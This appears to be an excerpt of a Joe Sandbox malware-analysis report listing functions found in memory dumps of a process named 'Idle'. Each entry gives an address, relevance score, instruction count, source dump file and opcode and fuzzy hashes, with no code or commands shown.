                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce5360a1f2394da7dc207b8b1c2d98272a86977eff163b6b6d32b629e13eb67c
                  • Instruction ID: a562f481416f964a7ae09c0745bd2cd4cf93e9891f9f65f911973c48ec0363e9
                  • Opcode Fuzzy Hash: ce5360a1f2394da7dc207b8b1c2d98272a86977eff163b6b6d32b629e13eb67c
                  • Instruction Fuzzy Hash: 8A216030A0950E9FDB95EF68C8685BE77E1FF18314F0549BAD41AC71A5DB74E640CB40
                  Function 00007FFD9BA2893E Relevance: .1, Instructions: 81COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c03f882c5ed107c8719b85f7b8bf458701188f86bff602716add39c76c378f8
                  • Instruction ID: 25b7bca3cba2cf4d4b11906f9c5f81949864d75897a54e11600adbbcf343fd9c
                  • Opcode Fuzzy Hash: 3c03f882c5ed107c8719b85f7b8bf458701188f86bff602716add39c76c378f8
                  • Instruction Fuzzy Hash: 16214A71E4992D8FEBA4DF4888517ED73B0FF24310F0041AAD05DE3291DA74AA868F41
                  Function 00007FFD9BA34508 Relevance: .1, Instructions: 77COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4eee47cc3c2913cdf2fda7c25c313c6f28b7bf30f18cd37a52c1ddd4cb2a63c6
                  • Instruction ID: aba40d0e6c1d684f152eae39d53fed2b57a7a4e9d3120b7da5d205d90437940f
                  • Opcode Fuzzy Hash: 4eee47cc3c2913cdf2fda7c25c313c6f28b7bf30f18cd37a52c1ddd4cb2a63c6
                  • Instruction Fuzzy Hash: 95219D30E0951E8FEB98EF58C8A5AFE73A1FF58305F01007EE01AE3295CE7569408790
                  Function 00007FFD9BA224E0 Relevance: .1, Instructions: 77COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8210bdb83258bb3b5c4b26a81fa9c4720cbf956b281919c70e3622e7a00de16e
                  • Instruction ID: f76974eb7c7723ed0e6d166e01aa8a39c48198c361a68b86d54fae15d3b23409
                  • Opcode Fuzzy Hash: 8210bdb83258bb3b5c4b26a81fa9c4720cbf956b281919c70e3622e7a00de16e
                  • Instruction Fuzzy Hash: 3F21AC2098E2CA4FDB179BB488765E53FB0AF07310B0A44EED49ACA0A3D96D6156C312
                  Function 00007FFD9BA1A711 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61024300a563c2db6d6729a5c2f9195e30759c087250cb9f5ae3212e60390424
                  • Instruction ID: aafb1ad64ea34c269b1db4843f190eeaa01efa8e4d82419b5d895c92f468ab83
                  • Opcode Fuzzy Hash: 61024300a563c2db6d6729a5c2f9195e30759c087250cb9f5ae3212e60390424
                  • Instruction Fuzzy Hash: 5721813090864D8FDB84EF68C855AA93BF0FF1C305F01056AE85DC7265DB70E540CB80
                  Function 00007FFD9BA352A5 Relevance: .1, Instructions: 73COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 184480552e1f1bd8729094230353eef748a5aac874d6d8575d84b3d1adccc957
                  • Instruction ID: 62e6efcc9b9fd18a2bc8925fde8940b478f035873247aa1e4ddcf3e7449ce7b8
                  • Opcode Fuzzy Hash: 184480552e1f1bd8729094230353eef748a5aac874d6d8575d84b3d1adccc957
                  • Instruction Fuzzy Hash: 9F118130A1A54E4FEB61EBE8C8A95A977E0FF59300F4649B6D41DC70B6EE74E6408600
                  Function 00007FFD9BA134A8 Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 81821eec5a6ae1815798b75f523c8d97b3b71d8f5ba1ff68b99deabf47b55433
                  • Instruction ID: 39f4dbe644322b737d5e981796785a7ea24e31727cab4ec5dbd1161fb22ab2b1
                  • Opcode Fuzzy Hash: 81821eec5a6ae1815798b75f523c8d97b3b71d8f5ba1ff68b99deabf47b55433
                  • Instruction Fuzzy Hash: F821AF3094E68A9FD792EBB488685A97FF0EF0A324F0905F6D059C70A2DA789545C711
                  Function 00007FFD9BA27CFD Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: baa6f45540ccd9552e6c700673de9a1021731860bde986fe876aba6a3dfe8b3d
                  • Instruction ID: a5aa31c3a9a1477bb855d35eaf0a16d42531b1edc2eab053210b67334c0836c4
                  • Opcode Fuzzy Hash: baa6f45540ccd9552e6c700673de9a1021731860bde986fe876aba6a3dfe8b3d
                  • Instruction Fuzzy Hash: 2B11E63098A54E4FDB55EB74C8695F97BE0EF09314F0504BAD81DC70A2DA795B41CB40
                  Function 00007FFD9BA2F869 Relevance: .1, Instructions: 71COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 86456c273cb812da0fb6b7f00c63e6a64a287babb2793e588a3c7c57c2ca8b8c
                  • Instruction ID: c3568f87ba291964eebb4fd148a460ddedf38a26e0e16eca126c3c96cd7fcf16
                  • Opcode Fuzzy Hash: 86456c273cb812da0fb6b7f00c63e6a64a287babb2793e588a3c7c57c2ca8b8c
                  • Instruction Fuzzy Hash: 96210C71E5550D9FDF9CDB58C465AADB7A1EF58310F0100BED00EE72A1CE75A9408B40
                  Function 00007FFD9BA10A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df57d3bd787a6f129ce64a65cd9f9bf6481a38b822a320cd6ae05ee3d92c066e
                  • Instruction ID: c1fd9e34f496ba5b254d733e85d6ca6a113729f10995b9fbd1cde83dbada7557
                  • Opcode Fuzzy Hash: df57d3bd787a6f129ce64a65cd9f9bf6481a38b822a320cd6ae05ee3d92c066e
                  • Instruction Fuzzy Hash: 1911BF31A0E50E4FEBA0EBA8C8695BE7BE1FF58710F4655B6D419C70A6EE74A6408700
                  Function 00007FFD9BA26F11 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 780d05fafa202a1ad10b32bda66deca8bba9873f45bbb31a48bb379a5e98a4f1
                  • Instruction ID: 143385a0131d24b1abc08e21af07a0d708349735908aece79420ce86de7e2314
                  • Opcode Fuzzy Hash: 780d05fafa202a1ad10b32bda66deca8bba9873f45bbb31a48bb379a5e98a4f1
                  • Instruction Fuzzy Hash: 7911DF30A0A64E8FEFA8EF68C4656BD3BE0FF18300F0501BED419C71A2DA74A544C780
                  Function 00007FFD9BA1B2D8 Relevance: .1, Instructions: 68COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d68cee7a6708514c94f49cec324ed779c19779d05a165e29c98e8b325ae2d1e
                  • Instruction ID: 1840f00fbe63693d760fca62157c55f41339c7d7e939de73e3185ffdedea0fe5
                  • Opcode Fuzzy Hash: 5d68cee7a6708514c94f49cec324ed779c19779d05a165e29c98e8b325ae2d1e
                  • Instruction Fuzzy Hash: B9219030E0D61E8EFBA0EBA0C4546FE76E1EF48300F565576D019931E5DFB8A6958B40
                  Function 00007FFD9BA22681 Relevance: .1, Instructions: 68COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4ed65b75759bdfc225b298cdb8c9755ab78000ce267efac49fb020ad459cf77
                  • Instruction ID: ce25891ada56b0c67773e9450ea48bcf09a9f39bdab193ae0f80b1fff4a29a6a
                  • Opcode Fuzzy Hash: c4ed65b75759bdfc225b298cdb8c9755ab78000ce267efac49fb020ad459cf77
                  • Instruction Fuzzy Hash: F811BE31A5A74D8FDB58EF58C9A55E93BE1FF58304F06027EE84AC31A1CB74A540CB81
                  Function 00007FFD9BA32470 Relevance: .1, Instructions: 68COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 874ad09b3746bd8caba8887c2e1d7c5dfc56d2187aa644b26d7629c827b1ecdf
                  • Instruction ID: e449525e09f7784a548f102ee9097b20f43a7f031f384e5904c55f32f58e152e
                  • Opcode Fuzzy Hash: 874ad09b3746bd8caba8887c2e1d7c5dfc56d2187aa644b26d7629c827b1ecdf
                  • Instruction Fuzzy Hash: 89113D20B1D72F46F67983C894745B47351FF90341B164579D44B870DBC86CBB808780
                  Function 00007FFD9BA2F411 Relevance: .1, Instructions: 66COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 147707c7cf3f32e1f56266846e460b4e79cca12f045fc4818a26ed5ffec64e62
                  • Instruction ID: ec91854c195ae5d5ef8d2e9a6c0fde61c53a0f70dd3a90577897a80fe591500c
                  • Opcode Fuzzy Hash: 147707c7cf3f32e1f56266846e460b4e79cca12f045fc4818a26ed5ffec64e62
                  • Instruction Fuzzy Hash: 38117C30A4964E8FDF98EF68C8A96BD3BA0FF68304F5105BEE419C71A5DB75A140C741
                  Function 00007FFD9BA24989 Relevance: .1, Instructions: 66COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 15ebb1425a4ad257c4ad3b0113dcd157638d62f0cee5c3ee89abae89f75ac70e
                  • Instruction ID: e546251695ba558c0474b39d0232e2acb06a401766cae4a2073b599793351471
                  • Opcode Fuzzy Hash: 15ebb1425a4ad257c4ad3b0113dcd157638d62f0cee5c3ee89abae89f75ac70e
                  • Instruction Fuzzy Hash: 6121A130A0EA8E8FEB99EF68C4662BD3BA0FF59300F0505BFD419C61A6DE746540C741
                  Function 00007FFD9BA35A49 Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4cc8b52483fcf23f6aecd9375768a84990b5c8394df6bc8e82cbd1bfd870c71a
                  • Instruction ID: 202e777d0bd338aeea91bc5fe3cd3a14db5087a180982c17d74ec105ba4c2e99
                  • Opcode Fuzzy Hash: 4cc8b52483fcf23f6aecd9375768a84990b5c8394df6bc8e82cbd1bfd870c71a
                  • Instruction Fuzzy Hash: 0511CD71E0A65E8FDB55DF68C8656FD7BA0FF58300F0500BBE409D72E2CA7899008791
                  Function 00007FFD9BA27055 Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 89071fd310e6bf205ff38208169ef5d3944a0597cbe298b1c407d4a10047a27c
                  • Instruction ID: e6729d6f158b42f95f61b2892082269ec3fc950e635e38721dccd71ef0434d81
                  • Opcode Fuzzy Hash: 89071fd310e6bf205ff38208169ef5d3944a0597cbe298b1c407d4a10047a27c
                  • Instruction Fuzzy Hash: CB110431A4EA4E5FEB6DDF6488B56B83BA0FF15304F0500BED459C61A2DE656E48C701
                  Function 00007FFD9BA24EC5 Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64422fc9999daa8721d3bc80639b7418ee09dc215d0f2566269c6e746cf69ee1
                  • Instruction ID: 815841e25e90350bc41ab275b816eb4cbfde4521b05c5fe39110e71f3d323a73
                  • Opcode Fuzzy Hash: 64422fc9999daa8721d3bc80639b7418ee09dc215d0f2566269c6e746cf69ee1
                  • Instruction Fuzzy Hash: 14115731A0EA8D4BEB69DF64C8B55B83B90FF54304F0600BED55EC24F6DEA5A604C301
                  Function 00007FFD9BA24A25 Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a38d874b25fceffad26988ba64851238dd68af2cbc314add15c8aad11ac74d73
                  • Instruction ID: 3e39bf7c8f152ca349dffae81844c3904a54f0c838d29ddfb51cc3714e28a566
                  • Opcode Fuzzy Hash: a38d874b25fceffad26988ba64851238dd68af2cbc314add15c8aad11ac74d73
                  • Instruction Fuzzy Hash: FF11A230A4964E8FEBA8EF68C4692BD7BA0FF58300F0105BED419C71A5DE74A540C740
                  Function 00007FFD9BA275E1 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb2bf7ef7b1c083894473ad68bbcdead2a49064eede65e41c7042097f7465ec0
                  • Instruction ID: 5c021ba88e07a261f64a226c1f0fbae3837b9e5badeeec90073304493756b894
                  • Opcode Fuzzy Hash: eb2bf7ef7b1c083894473ad68bbcdead2a49064eede65e41c7042097f7465ec0
                  • Instruction Fuzzy Hash: 7911C230A4E54E8FEBA1EBA8C965AEE77E1FF59300F010572D018D71A2DA78AA008701
                  Function 00007FFD9BA33E4D Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8647e51cdce82e7336b7102024cbcca39a395086a739d603850dbadf5814ad9
                  • Instruction ID: a1e42529631799e2a5712f209f71817882519ae57571eb7caf21dbc532ef2300
                  • Opcode Fuzzy Hash: d8647e51cdce82e7336b7102024cbcca39a395086a739d603850dbadf5814ad9
                  • Instruction Fuzzy Hash: C6110432B0E60F0BE7B0A6D844681FE26D1DF55360F120136E40EE72A2DDA92D494392
                  Function 00007FFD9BA23945 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2942636bf12e261727b453e55f8c11e38894b885f0e959aceef48077a4cabab4
                  • Instruction ID: bc690dba3d754d76556ef1099a93a5630ca89e702a26efc867b80a695a435c0d
                  • Opcode Fuzzy Hash: 2942636bf12e261727b453e55f8c11e38894b885f0e959aceef48077a4cabab4
                  • Instruction Fuzzy Hash: 2A11E460E0E68E4FF762A76888761AD3BF0EF1B310F0605B6D499CA0E3DD6866048742
                  Function 00007FFD9BA1121D Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6d2d4280ae989cf78d8f72f17a4ffefe66804c46c99f05c7f3b5f77aa283a3eb
                  • Instruction ID: dd5a3f2b34e561c470e7ad6f9e5da6f703e30959e309e94abc7c3591b1a6d866
                  • Opcode Fuzzy Hash: 6d2d4280ae989cf78d8f72f17a4ffefe66804c46c99f05c7f3b5f77aa283a3eb
                  • Instruction Fuzzy Hash: 3911E230E0A64E4EEBA9EBA8C4B82F93BE0FF69300F4510BED459C60E2DE746540C700
                  Function 00007FFD9BA25239 Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04a7fca26b6e55239e0b1e7b5b5a07dd30c3badd6fb417f6016cc677d07b2c06
                  • Instruction ID: fd852e0ed17f038aca13bc02ca65dbc96b518bc02dcb199a4cffb33a2e1a8bcb
                  • Opcode Fuzzy Hash: 04a7fca26b6e55239e0b1e7b5b5a07dd30c3badd6fb417f6016cc677d07b2c06
                  • Instruction Fuzzy Hash: F011D030A0A68E4FEB99EFA4C8696B97BF0FF19300F0504BED41AC61E2DE74A540C741
                  Function 00007FFD9BA1CAE0 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04948003c25ea707abc8ad4cf9acb35c7d99bfc791a6169c1f698392fa10b7cd
                  • Instruction ID: d63621fe4d692a9390c126a03c7e64c69922653c8f94692c3a4668f026c7eb57
                  • Opcode Fuzzy Hash: 04948003c25ea707abc8ad4cf9acb35c7d99bfc791a6169c1f698392fa10b7cd
                  • Instruction Fuzzy Hash: 30118630A0E64E4FDB96EB68C8A95B97BB0FF15300F0504BBD459CB0A2EE796A44C740
                  Function 00007FFD9BA22B51 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc3af328d64b2c85a5e74262ff4f851ce6f64086df13e4e1c5e2992639a03e5d
                  • Instruction ID: a06d4355a9028f5081d45c899b7ff1b55ccd1af8b2bba208fb8a8b0b19e9483f
                  • Opcode Fuzzy Hash: bc3af328d64b2c85a5e74262ff4f851ce6f64086df13e4e1c5e2992639a03e5d
                  • Instruction Fuzzy Hash: ED11C834A4E64E8EE791EFB888985F97BE0FF19301F0544BAD459C7066DE7492448701
                  Function 00007FFD9BA314F0 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8d10cd95d7bd8b137e76276de1e3fd54c1e0a43a9e61f51f8d235b860328bace
                  • Instruction ID: 6304f7a702606e887a8b2bb160842950076f058bed34d9b9ee6eca9a9d5afaf7
                  • Opcode Fuzzy Hash: 8d10cd95d7bd8b137e76276de1e3fd54c1e0a43a9e61f51f8d235b860328bace
                  • Instruction Fuzzy Hash: 98110231B59A0A4BDBB4FB54D0205FAB3D1EF64215F01063AD44FC35E2CE28BA058380
                  Function 00007FFD9BA2F88E Relevance: .1, Instructions: 58COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 427cdd2216be832d88a25b5d5b8b22d9a38a2030fb3009b508008b58915300f5
                  • Instruction ID: 29cc7e7a6830bfc86600f1595484cfebd4a81b97fbdda1fff83c604cbac43aa2
                  • Opcode Fuzzy Hash: 427cdd2216be832d88a25b5d5b8b22d9a38a2030fb3009b508008b58915300f5
                  • Instruction Fuzzy Hash: 7C112B30A1990D9FDF9CDB58C465ABDB7A1EF68310F4101BED04EE76A1CE65AA818B00
                  Function 00007FFD9BA24FED Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00c7ee28dc0500e9464511ff50fec5bf680b9e6e87c665921f129711f432af44
                  • Instruction ID: 13cfbe4ef2b7b8d7bce97f6941e0f499c50900130aec64c458ab45ece0a93f2f
                  • Opcode Fuzzy Hash: 00c7ee28dc0500e9464511ff50fec5bf680b9e6e87c665921f129711f432af44
                  • Instruction Fuzzy Hash: 9511BF30A4E64E9FEB58EF68CC696B97BB0FF18300F0505BED41EC61A6DE75A6408741
                  Function 00007FFD9BA27671 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cff33959c7c2bac6fb15efa45f4d637758d7050cdbf9d5ac410656d6f9b3145d
                  • Instruction ID: d91d73e9fa6ca1ffe48bd18bf63f8ea911afde1bf4756b4661175cb571b20c58
                  • Opcode Fuzzy Hash: cff33959c7c2bac6fb15efa45f4d637758d7050cdbf9d5ac410656d6f9b3145d
                  • Instruction Fuzzy Hash: 0311C430A4954E8FE751EBB8C95C6BA7BF4FF19301F0504B6D418D30A1DA78AB80CB10
                  Function 00007FFD9BA27E21 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 66ae0078eaa7e5d534345b4d2c23d6b6be2d5d7cb446e84aec3e2f04163b6a2d
                  • Instruction ID: ddf5c32748aa10e43740a270d73f3d947c786e98a7baec73c644db85285ced00
                  • Opcode Fuzzy Hash: 66ae0078eaa7e5d534345b4d2c23d6b6be2d5d7cb446e84aec3e2f04163b6a2d
                  • Instruction Fuzzy Hash: FA018030A8A64E4FEB59EF64C4695B97BA0FF19304F1504BED41AC71A2DF75AE40C702
                  Function 00007FFD9BA251AD Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 56146c7bdde30fc790f55ebebb96fdb07ff57f652e1f1147234f8acc4342a243
                  • Instruction ID: 53456aca5be96691fbf9145587febe35985a7d9cc24ece0f18abefaf8e671811
                  • Opcode Fuzzy Hash: 56146c7bdde30fc790f55ebebb96fdb07ff57f652e1f1147234f8acc4342a243
                  • Instruction Fuzzy Hash: C8119130A5A64E4BEB58EF64C8696BA77F1FF18300F0505BED42AC61E2DE75A6408741
